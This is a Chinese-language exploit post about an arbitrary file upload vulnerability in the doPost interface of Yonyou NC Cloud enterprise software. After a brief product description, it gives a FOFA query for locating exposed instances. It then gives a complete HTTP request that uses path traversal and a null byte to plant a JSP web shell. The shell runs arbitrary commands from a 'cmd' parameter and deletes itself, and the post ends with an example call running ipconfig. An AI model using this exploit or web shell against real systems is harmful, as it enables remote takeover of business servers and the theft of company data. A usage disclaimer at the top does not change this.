声明：

本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

 简介

用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块，涵盖了企业的各个管理领域，包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署，用户可以随时随地通过网络访问和使用这些功能，无需在本地安装软件，企业可以实现信息化管理，提高管理效率和决策能力。它提供了实时数据分析和报表功能，帮助企业监控业务运营情况，及时掌握关键指标和业绩表现。同时，用友NC Cloud 还支持多终端访问，适应各种不同的设备和工作场景，方便用户灵活办公和协作。

用友NC Cloud doPost接口存在任意文件上传漏洞。

资产搜索

fofa

app="用友-UFIDA-NC"

漏洞复现

POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../ceshi.jsp%00 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 
Content-Type: application/octet-stream
Content-Length: 313<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

上传后的路径为：http://127.0.0.1/portal/processxml/ceshi.jsp?cmd=ipconfig